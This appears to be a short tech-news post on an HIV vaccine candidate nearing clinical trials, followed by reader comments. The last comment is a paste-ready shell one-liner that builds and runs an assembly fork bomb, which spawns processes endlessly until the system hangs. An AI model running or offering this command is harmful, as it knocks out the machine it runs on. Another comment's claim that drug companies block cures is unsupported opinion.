HIV Vaccine Ready For Clinical Trials
amigoro writes with the happy news that a possible vaccine against HIV is nearing readiness for clinical trials. The compound could provide a 'double whammy' by not only inoculating the patient against future infection, but destroying an HIV infection in progress. "The vaccine is an artificial virus-like particle whose outer casing consists of the TBI (T- and B cell epitopes containing immunogen) protein constructed by the researchers combined with the polyglucin protein. This protein contains nine components stimulating different cells of the immune system: both the ones that produce antibodies and the ones that devour the newcomer."
If it's not addictive, and not something that infected person's have to take for the rest of their lives, I just don't think the drug companies will approve.
Write your own Choose Your Own Adventure. http://www.freegameengines.org/gamebook-engine/
How do you know Nature invented it?
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;